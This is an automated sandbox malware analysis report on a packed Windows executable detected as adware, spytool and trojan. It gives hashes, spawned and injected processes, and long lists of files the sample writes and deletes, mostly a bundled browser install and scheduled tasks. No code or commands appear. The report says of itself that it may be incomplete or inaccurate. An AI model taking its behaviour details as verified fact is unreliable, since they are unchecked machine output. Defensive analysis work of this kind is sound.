not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 780fc5ed47f296c4e1b277c467eafa42
SHA1: 0a7431aeeda76cf17e302642f1a8c04ed91940b7
SHA256: 73924b8ea1cd3263d45f55622c9c4cca66cd9daebe7ce6f191cc606c0dcaa123
SSDeep: 6144:Ke34QY TM7L 2aWM2jYMXz1gNSuw2GU/3HkL75 ZPPfnE2Qyn2FEtt2NB6 sO:ZYpMWMYXz1gtw23ELF ZPPfnEUnsEWfb
Size: 309485 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
upgmsd_re_005010096.exe:1928
gmsd_re_005010096.exe:740
nsk15.tmp:1340
nsj35.tmp:588
8819.exe:368
nssF.tmp:1488
setup.exe:828
taskkill.exe:1408
taskkill.exe:248
taskkill.exe:1092
wmic.exe:1336
amisid.exe:496
amisid.exe:600
tasklist.exe:1852
tasklist.exe:492
nsr18.tmp:1388
nsr18.tmp:460
nsx27.tmp:1340
nsx27.tmp:336
encrypt.exe:1700
encrypt.exe:1364
encrypt.exe:1564
encrypt.exe:496
%original file name%.exe:860
nsd41.tmp:816
nsk6.tmp:496
nsqA.tmp:508
The SpyTool injects its code into the following process(es):
nsk3C.tmp:192
nsb2E.tmp:908
nsp45.tmp:596
nsr21.tmp:908
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process upgmsd_re_005010096.exe:1928 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
The process nsk3C.tmp:192 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp (0 bytes)
The process gmsd_re_005010096.exe:740 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
The process nsk15.tmp:1340 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (0 bytes)
The process nsj35.tmp:588 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (0 bytes)
The process nsb2E.tmp:908 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (0 bytes)
The process 8819.exe:368 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
The SpyTool deletes the following file(s):
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (0 bytes)
The process nssF.tmp:1488 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)
The process setup.exe:828 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
